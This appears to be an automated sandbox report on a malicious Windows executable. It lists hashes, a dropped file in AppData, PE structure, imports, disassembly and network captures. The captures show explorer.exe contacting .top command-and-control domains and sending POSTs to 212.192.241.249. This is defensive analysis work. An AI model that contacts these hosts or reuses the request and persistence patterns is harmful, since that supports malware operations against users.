SHA-256:	C1233AC55E45B60D50326C3E3380DA5A7F5EA83ED5E9E93EB99D0DEC01E5004F
SHA-512:	6AE1F2501094CE91205945665726317E3E18116684D2975C9C5C575519D33E00B4E3A0BA1C5329BC7F34819A736CEFFEC75DCE383EF8C7A798F93886F11073E7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........#...p...p...p..Wp...p..bp...p..Vp...p..op...p...p...p..Sp...p..fp...p..ap...pRich...p........PE..L...*}._......................\|..... \|....... ....@.................................k,..........................................x....p~..g....................~..... ...............................Hz..@............................................text...(........................... ..`.data....A{.. ......................@....rsrc....g...p~..h... ..............@..@.reloc........~.....................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\gahfeaj Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	304128
Entropy (8bit):	5.823579577144565
Encrypted:	false
SSDEEP:	6144:QSzvF8GFy9eGzktM61i2hIaVSXuZet0yy8Eo10gytXunKdi:7zg93zH2h7VSXuZet0yy8E2yt/d
MD5:	9953ACB0FEE6C45FC5AA12D21AC3AD1B
SHA1:	AFAF20C658C307F53E804639710C2DCE09E9C3BA
SHA-256:	5231916FBEB9C166A9BBB4E7C576B210019A3A84C17CBE777CB099AB3AAD5DD8
SHA-512:	B94F6706AC60C695C5CB38897381A062BF20801568EE0A12BCDF14BC8FC0340BDC5F29CFDDCB922958C5E6631DE085D7B3C5B98CD79A2ABA6AA2B3DB9634C094
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#...p...p...p..Wp...p..bp...p..Vp...p..op...p...pa..p..Sp...p..fp...p..ap...pRich...p........PE..L...[S;`......................\|..... ........ ....@.................................j...........................................x....p~..h....................~.....................................P...@............................................text............................... ..`.data....A{.. ......................@....rsrc....h...p~..j...$..............@..@.reloc..<.....~.....................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\gahfeaj:Zone.Identifier Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.823579577144565
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	qhQ6armJ25.exe
File size:	304128
MD5:	9953acb0fee6c45fc5aa12d21ac3ad1b
SHA1:	afaf20c658c307f53e804639710c2dce09e9c3ba
SHA256:	5231916fbeb9c166a9bbb4e7c576b210019a3a84c17cbe777cb099ab3aad5dd8
SHA512:	b94f6706ac60c695c5cb38897381a062bf20801568ee0a12bcdf14bc8fc0340bdc5f29cfddcb922958c5e6631de085d7b3c5b98cd79a2aba6aa2b3db9634c094
SSDEEP:	6144:QSzvF8GFy9eGzktM61i2hIaVSXuZet0yy8Eo10gytXunKdi:7zg93zH2h7VSXuZet0yy8E2yt/d
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........#...p...p...p..Wp...p..bp...p..Vp...p..op...p...pa..p..Sp...p..fp...p..ap...pRich...p........PE..L...[S;`...................

File Icon


Icon Hash:	b2e8e8e8a2a2a488

Static PE Info

General
Entrypoint:	0x418120
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x603B535B [Sun Feb 28 08:24:59 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	ee6524c22cc0cf74d4c47508c44cd3e2

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007F537CE15AEBh
call 00007F537CE157F6h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 0042FDE0h
push 0041C340h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF98h
push ebx
push esi
push edi
mov eax, dword ptr [00432064h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00401314h]
cmp dword ptr [01BE51BCh], 00000000h
jne 00007F537CE157F0h
push 00000000h
push 00000000h
push 00000001h
push 00000000h
call dword ptr [00401310h]
call 00007F537CE15973h
mov dword ptr [ebp-6Ch], eax
call 00007F537CE1993Bh
test eax, eax
jne 00007F537CE157ECh
push 0000001Ch
call 00007F537CE15930h
add esp, 04h
call 00007F537CE19298h
test eax, eax
jne 00007F537CE157ECh
push 00000010h
call 00007F537CE1591Dh
add esp, 04h
push 00000001h
call 00007F537CE191E3h
add esp, 04h
call 00007F537CE16E9Bh
mov dword ptr [ebp-04h], 00000000h
call 00007F537CE16A7Fh
test eax, eax

Rich Headers

Programming Language:

[LNK] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x303c4	0x78	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17e7000	0x68b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x17ee000	0x17cc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1410	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x17f50	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x3c4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x30ae2	0x30c00	False	0.609615384615	data	7.04028491917	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x32000	0x17b41c0	0x1400	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x17e7000	0x68b0	0x6a00	False	0.529407429245	data	5.46609013529	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x17ee000	0x1143c	0x11600	False	0.0750196717626	data	0.974071358106	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AFX_DIALOG_LAYOUT	0x17eb820	0x2	data	Divehi; Dhivehi; Maldivian	Maldives
YONAMIKORUFENI	0x17ea8c0	0xee8	ASCII text, with very long lines, with no line terminators	Spanish	Panama
RT_CURSOR	0x17eb828	0x130	data	Divehi; Dhivehi; Maldivian	Maldives
RT_CURSOR	0x17eb958	0xf0	data	Divehi; Dhivehi; Maldivian	Maldives
RT_CURSOR	0x17eba48	0x10a8	dBase III DBT, version number 0, next free block index 40	Divehi; Dhivehi; Maldivian	Maldives
RT_ICON	0x17e74f0	0x8a8	data	Spanish	Panama
RT_ICON	0x17e7d98	0x6c8	data	Spanish	Panama
RT_ICON	0x17e8460	0x568	GLS_BINARY_LSB_FIRST	Spanish	Panama
RT_ICON	0x17e89c8	0x10a8	data	Spanish	Panama
RT_ICON	0x17e9a70	0x988	data	Spanish	Panama
RT_ICON	0x17ea3f8	0x468	GLS_BINARY_LSB_FIRST	Spanish	Panama
RT_STRING	0x17ecc50	0xfc	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x17ecd50	0x252	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x17ecfa8	0x458	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x17ed400	0x25c	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x17ed660	0x24a	data	Divehi; Dhivehi; Maldivian	Maldives
RT_ACCELERATOR	0x17eb7a8	0x78	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_CURSOR	0x17ecaf0	0x30	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_ICON	0x17ea860	0x5a	data	Spanish	Panama
RT_VERSION	0x17ecb20	0x12c	data	Divehi; Dhivehi; Maldivian	Maldives

Imports

DLL	Import
KERNEL32.dll	UnregisterWait, SetCriticalSectionSpinCount, HeapCompact, lstrcmpA, FindFirstFileW, FindFirstChangeNotificationW, EnumCalendarInfoA, WriteConsoleInputW, IsBadStringPtrW, EnumDateFormatsExW, CopyFileExW, GetNumaProcessorNode, TlsGetValue, SetLocalTime, UnmapViewOfFile, MoveFileExA, CommConfigDialogA, GetNumberOfConsoleInputEvents, GetConsoleAliasExesLengthA, SetErrorMode, FindResourceW, SetUnhandledExceptionFilter, LoadLibraryExW, SetDllDirectoryW, InterlockedIncrement, GetQueuedCompletionStatus, VerSetConditionMask, ReadConsoleA, InterlockedDecrement, WaitNamedPipeA, SetMailslotInfo, WritePrivateProfileSectionA, SetDefaultCommConfigW, SetFirmwareEnvironmentVariableA, CreateJobObjectW, GlobalLock, AddConsoleAliasW, SetVolumeMountPointW, GetComputerNameW, OpenSemaphoreA, CreateHardLinkA, GetFileAttributesExA, _lclose, GetModuleHandleW, GetTickCount, GetCommConfig, CreateNamedPipeW, GetProcessHeap, IsBadReadPtr, GetConsoleAliasesLengthA, GetSystemTimeAsFileTime, GetPrivateProfileStringW, GetConsoleTitleA, CreateRemoteThread, GetCompressedFileSizeW, EnumTimeFormatsA, SetCommState, GetSystemWow64DirectoryA, CreateActCtxW, WaitForMultipleObjectsEx, InitializeCriticalSection, GetProcessTimes, TlsSetValue, AllocateUserPhysicalPages, OpenProcess, FindResourceExA, FatalAppExitW, GetThreadSelectorEntry, GetCalendarInfoW, GetCalendarInfoA, ReadFileScatter, SetSystemTimeAdjustment, GetSystemWindowsDirectoryA, ReadConsoleOutputW, SetConsoleCP, DeleteVolumeMountPointW, InterlockedPopEntrySList, GetFileAttributesA, lstrcpynW, SetConsoleMode, GetVolumePathNamesForVolumeNameW, CreateSemaphoreA, SetConsoleCursorPosition, VerifyVersionInfoA, TerminateProcess, GetAtomNameW, IsDBCSLeadByte, GetModuleFileNameW, lstrcatA, QueryInformationJobObject, GetBinaryTypeW, GetVolumePathNameA, lstrlenW, GetPrivateProfileSectionNamesW, GlobalUnlock, VirtualUnlock, GetTempPathW, GetStringTypeExA, GetNamedPipeHandleStateW, GetLargestConsoleWindowSize, GetPrivateProfileIntW, VerifyVersionInfoW, InterlockedExchange, ReleaseActCtx, SetCurrentDirectoryA, GetStdHandle, FindFirstFileA, FreeLibraryAndExitThread, GetLastError, ChangeTimerQueueTimer, BackupRead, BindIoCompletionCallback, GetProcAddress, GetLongPathNameA, HeapSize, CreateJobSet, LocalLock, LockFileEx, EnterCriticalSection, VerLanguageNameW, SearchPathA, BuildCommDCBW, FindClose, LoadLibraryA, Process32FirstW, OpenMutexA, ProcessIdToSessionId, LocalAlloc, MoveFileA, BuildCommDCBAndTimeoutsW, GetExitCodeThread, GetNumberFormatW, SetCurrentDirectoryW, SetFileApisToANSI, QueryDosDeviceW, HeapWalk, GetPrivateProfileStructA, GetTapeParameters, SetNamedPipeHandleState, SetEnvironmentVariableA, GetVolumePathNamesForVolumeNameA, GetDefaultCommConfigA, WriteProfileStringA, WTSGetActiveConsoleSessionId, EnumDateFormatsA, WaitCommEvent, FindFirstChangeNotificationA, GetProcessShutdownParameters, QueueUserWorkItem, ContinueDebugEvent, IsDebuggerPresent, FatalExit, FreeEnvironmentStringsW, EnumResourceNamesA, FindNextFileW, WriteProfileStringW, VirtualProtect, EnumDateFormatsW, CompareStringA, FatalAppExitA, PeekConsoleInputA, DeleteCriticalSection, WriteConsoleOutputAttribute, OutputDebugStringA, DuplicateHandle, FindFirstVolumeA, GetVersionExA, TlsAlloc, TerminateJobObject, CloseHandle, GetVersion, DeleteTimerQueueTimer, GlobalAddAtomW, SetFileValidData, FindActCtxSectionStringW, ResetWriteWatch, UnregisterWaitEx, ReadConsoleOutputCharacterW, TlsFree, GetProfileSectionW, EnumSystemLocalesW, lstrcpyW, CopyFileExA, LocalFileTimeToFileTime, CreateFileW, SetStdHandle, GetFullPathNameA, GetThreadContext, WritePrivateProfileStringW, ExitProcess, RaiseException, GetCommandLineW, HeapSetInformation, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, DecodePointer, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, HeapValidate, EncodePointer, SetLastError, HeapCreate, WriteFile, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, LeaveCriticalSection, LoadLibraryW, GetCurrentProcess, UnhandledExceptionFilter, HeapAlloc, GetModuleFileNameA, HeapReAlloc, HeapQueryInformation, HeapFree, RtlUnwind, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetStringTypeW, WriteConsoleW, OutputDebugStringW, IsProcessorFeaturePresent, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers
USER32.dll	GetMessageTime
GDI32.dll	GetBitmapBits
ADVAPI32.dll	GetFileSecurityW
MSIMG32.dll	AlphaBlend

Version Infos

Description	Data
Translations	0x0022 0x023c

Possible Origin

Language of compilation system	Country where language is spoken	Map
Divehi; Dhivehi; Maldivian	Maldives
Spanish	Panama

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 18:24:50.037879944 CET	49714	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.065604925 CET	80	49714	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.065758944 CET	49714	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.066019058 CET	49714	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.066059113 CET	49714	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.093697071 CET	80	49714	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.207442999 CET	80	49714	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.207555056 CET	49714	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.208436966 CET	49714	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.235953093 CET	80	49714	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.260036945 CET	49715	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.287899017 CET	80	49715	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.288031101 CET	49715	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.288214922 CET	49715	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.288240910 CET	49715	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.428165913 CET	80	49715	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.428299904 CET	49715	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.428689957 CET	49715	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.456434965 CET	80	49715	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.767328024 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.795320988 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.799561977 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.799880028 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.870975971 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.919018984 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.919063091 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.919090033 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.919117928 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.919147968 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.919151068 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.919182062 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.919210911 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.919230938 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.919248104 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.919251919 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.919274092 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.919300079 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.919302940 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.919450045 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.947226048 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.961850882 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.961916924 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.961945057 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.961956978 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.961996078 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.962018967 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.962035894 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.962049007 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.962078094 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.962095022 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.962119102 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.962127924 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.962208033 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.989969015 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.990011930 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.990041018 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.990052938 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:50.990087032 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:50.990113020 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:51.017946959 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.018009901 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.018052101 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.018093109 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.018120050 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:51.018157959 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:51.018162966 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:51.018167973 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:51.045954943 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.046006918 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.046047926 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.046087027 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.046101093 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:51.046125889 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:51.046128035 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.046200991 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:51.074820042 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.074863911 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.074948072 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:51.074954033 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.074997902 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.075036049 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.075062037 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:51.075074911 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.075099945 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:51.075136900 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:51.075145006 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:51.103456020 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.103501081 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.103538990 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.103579044 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.103598118 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:51.103679895 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:51.131496906 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.131546021 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.131656885 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:51.159498930 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.159579039 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:51.159650087 CET	80	49716	212.192.241.249	192.168.2.4
Nov 25, 2021 18:24:51.159760952 CET	49716	80	192.168.2.4	212.192.241.249
Nov 25, 2021 18:24:51.187458038 CET	80	49716	212.192.241.249	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 18:24:49.960967064 CET	61516	53	192.168.2.4	8.8.8.8
Nov 25, 2021 18:24:49.985004902 CET	53	61516	8.8.8.8	192.168.2.4
Nov 25, 2021 18:24:49.996679068 CET	49182	53	192.168.2.4	8.8.8.8
Nov 25, 2021 18:24:50.034112930 CET	53	49182	8.8.8.8	192.168.2.4
Nov 25, 2021 18:24:50.222058058 CET	59920	53	192.168.2.4	8.8.8.8
Nov 25, 2021 18:24:50.259314060 CET	53	59920	8.8.8.8	192.168.2.4
Nov 25, 2021 18:24:50.441802979 CET	57458	53	192.168.2.4	8.8.8.8
Nov 25, 2021 18:24:50.765567064 CET	53	57458	8.8.8.8	192.168.2.4
Nov 25, 2021 18:24:56.235585928 CET	50579	53	192.168.2.4	8.8.8.8
Nov 25, 2021 18:24:56.273138046 CET	53	50579	8.8.8.8	192.168.2.4
Nov 25, 2021 18:25:02.845268011 CET	51703	53	192.168.2.4	8.8.8.8
Nov 25, 2021 18:25:03.853210926 CET	51703	53	192.168.2.4	8.8.8.8
Nov 25, 2021 18:25:04.899115086 CET	51703	53	192.168.2.4	8.8.8.8
Nov 25, 2021 18:25:06.899563074 CET	51703	53	192.168.2.4	8.8.8.8
Nov 25, 2021 18:25:10.962596893 CET	51703	53	192.168.2.4	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 25, 2021 18:24:49.960967064 CET	192.168.2.4	8.8.8.8	0x54b3	Standard query (0)	nalirou70.top	A (IP address)	IN (0x0001)
Nov 25, 2021 18:24:49.996679068 CET	192.168.2.4	8.8.8.8	0xba	Standard query (0)	xacokuo80.top	A (IP address)	IN (0x0001)
Nov 25, 2021 18:24:50.222058058 CET	192.168.2.4	8.8.8.8	0xbfc3	Standard query (0)	xacokuo80.top	A (IP address)	IN (0x0001)
Nov 25, 2021 18:24:50.441802979 CET	192.168.2.4	8.8.8.8	0x11d3	Standard query (0)	privacytoolzfor-you7000.top	A (IP address)	IN (0x0001)
Nov 25, 2021 18:24:56.235585928 CET	192.168.2.4	8.8.8.8	0x9022	Standard query (0)	xacokuo80.top	A (IP address)	IN (0x0001)
Nov 25, 2021 18:25:02.845268011 CET	192.168.2.4	8.8.8.8	0x5bd9	Standard query (0)	xacokuo80.top	A (IP address)	IN (0x0001)
Nov 25, 2021 18:25:03.853210926 CET	192.168.2.4	8.8.8.8	0x5bd9	Standard query (0)	xacokuo80.top	A (IP address)	IN (0x0001)
Nov 25, 2021 18:25:04.899115086 CET	192.168.2.4	8.8.8.8	0x5bd9	Standard query (0)	xacokuo80.top	A (IP address)	IN (0x0001)
Nov 25, 2021 18:25:06.899563074 CET	192.168.2.4	8.8.8.8	0x5bd9	Standard query (0)	xacokuo80.top	A (IP address)	IN (0x0001)
Nov 25, 2021 18:25:10.962596893 CET	192.168.2.4	8.8.8.8	0x5bd9	Standard query (0)	xacokuo80.top	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 25, 2021 18:24:49.985004902 CET	8.8.8.8	192.168.2.4	0x54b3	Name error (3)	nalirou70.top	none	none	A (IP address)	IN (0x0001)
Nov 25, 2021 18:24:50.034112930 CET	8.8.8.8	192.168.2.4	0xba	No error (0)	xacokuo80.top		212.192.241.249	A (IP address)	IN (0x0001)
Nov 25, 2021 18:24:50.259314060 CET	8.8.8.8	192.168.2.4	0xbfc3	No error (0)	xacokuo80.top		212.192.241.249	A (IP address)	IN (0x0001)
Nov 25, 2021 18:24:50.765567064 CET	8.8.8.8	192.168.2.4	0x11d3	No error (0)	privacytoolzfor-you7000.top		212.192.241.249	A (IP address)	IN (0x0001)
Nov 25, 2021 18:24:56.273138046 CET	8.8.8.8	192.168.2.4	0x9022	No error (0)	xacokuo80.top		212.192.241.249	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

edwxjxx.net

xacokuo80.top

kwcurllpj.com

privacytoolzfor-you7000.top

tpjfndspxp.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49714	212.192.241.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 18:24:50.066019058 CET	1	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://edwxjxx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 151 Host: xacokuo80.top
Nov 25, 2021 18:24:50.207442999 CET	2	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Thu, 25 Nov 2021 17:24:50 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1d b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49715	212.192.241.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
